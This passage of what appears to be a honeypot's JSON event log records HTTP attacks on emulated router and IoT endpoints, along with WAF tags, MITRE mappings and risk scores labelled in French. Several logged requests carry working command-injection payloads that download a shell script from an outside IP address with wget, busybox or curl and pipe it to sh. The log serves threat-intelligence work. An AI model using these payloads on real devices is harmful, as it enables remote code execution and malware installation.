\/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":301},{"id":11860780,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":60008,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":53,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/diagnostics.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00228e67fddb5ed6834bb822fb7e649cb34fc2111f10\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 332, \u0022payload_entropy\u0022: 5.150443942408179, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00222123da6bf2981ecb7cdb8fbeafa16484b5313c01\u0022, \u0022event_fingerprint\u0022: \u0022e6ce3ecceab9636480aaa58f13e911bc3c5df99a\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0340\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022SSRF Localhost SSRF\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0340\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022dd8886b00b92bca5f4045fff88693804\u0022, \u0022path_pattern_hash\u0022: \u00225c6e845fe850f7580662d9806abb9a8a\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 180\\r\\nConnection: close\\r\\n\\r\\nping=127.0.0.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s airspan;busybox wget http:\/\/91.92.40.1\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 180\\r\\nConnection: close\\r\\n\\r\\nping=127.0.0.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s airspan;busybox wget http:\/\/91.92.40.1\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d5af87b37d5e868777833595db2e628ea5887ad9\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/diagnostics.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/diagnostics.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":332},{"id":11860781,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":60022,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":58,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022]","http_method":"GET","http_target":"\/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022e67006b122fd955c6e4fea8ba6389299c1ad524e\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 274, \u0022payload_entropy\u0022: 5.0328112151970235, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022c956a4b470b31093611fb84180657d8dd50c006f\u0022, \u0022event_fingerprint\u0022: \u0022bf0db68fa256af2710f2dba892e5f292cad74f06\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022836aa189cc049a129fd31b9cba2e14a5\u0022, \u0022path_pattern_hash\u0022: \u00220af7fa5ddcabcc18b8efcc02ccd6f4d6\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nCon\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: 